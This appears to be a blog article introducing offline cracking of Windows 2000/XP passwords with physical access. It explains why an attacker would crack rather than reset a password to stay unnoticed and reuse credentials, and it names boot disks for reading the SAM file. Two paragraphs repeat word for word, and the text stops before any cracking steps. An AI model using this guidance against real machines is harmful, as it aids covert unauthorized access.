How Cracking Windows 2000 And XP Passwords With Only Physical Access
This article will cover how to crack Windows 2000/XP passwords with only physical access to the target box. I won't be covering into the internal structure of LM and NTLM hashes or what makes them so insecure, there are many other articles on the Internet that cover the basics of NT security so I would recommend that you Google for them. I will assume that the reader already knows the basics. There are a lot of articles floating around that tell interested parties how to use programs like PWdump to get NT password hashes. Using PWDump is what most folks recommend when Syskey is enabled on a system since the hashes in the SAM file are encrypted. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator account then PWdump is of little use.
Another question I get is why crack the password at all since one can get access to the machine by just deleting the SAM file and using a blank password (Windows 2000 only) or by using a Linux password reset boot disk (get one from http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html that works on both 2k and XP) and resetting it to whatever we like. The reason an attacker may want to crack the local password instead of changing it is two fold:
1. An attacker doesn't want to tip off the system administrators. If they notice that the old admin password no longer works they will get a bit suspicious don't you think?
2. The same account passwords may be used on other systems on the network. If the attacker can crack one machines admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access to.
This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to a bootable disk that can read the file system on the target machine. An attacker may have to get into the BIOs to set it to boot from the floppy or CD-ROM so setting up a BIOs password will help but if they can get into the case it's easy to reset. Any old Windows 9x boot disk should work for Fat32 drives, on NTFS drives I've used the Knoppix ( http://www.knoppix.org/ ) and PE Builder ( http://www.nu2.nu/pebuilder/ ) boot CDs with good success.
Another question I get is why crack the password at all since one can get access to the machine by just deleting the SAM file and using a blank password (Windows 2000 only) or by using a Linux password reset boot disk (get one from http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html that works on both 2k and XP) and resetting it to whatever we like. The reason an attacker may want to crack the local password instead of changing it is two fold:
1. An attacker doesn't want to tip off the system administrators. If they notice that the old admin password no longer works they will get a bit suspicious don't you think?
2. The same account passwords may be used on other systems on the network. If the attacker can crack one machines admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access to.
This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to a bootable disk that can read the file system on the target machine. An attacker may have to get into the BIOs to set it to boot from the floppy or CD-ROM so setting up a BIOs password will help but if they can get into the case it's easy to reset. Any old Windows 9x boot disk should work for Fat32 drives, on NTFS drives I've used the Knoppix ( http://www.knoppix.org/ ) and PE Builder ( http://www.nu2.nu/pebuilder/ ) boot CDs with good success.
Find more : windows 2000 password cracking
Comments
Post a Comment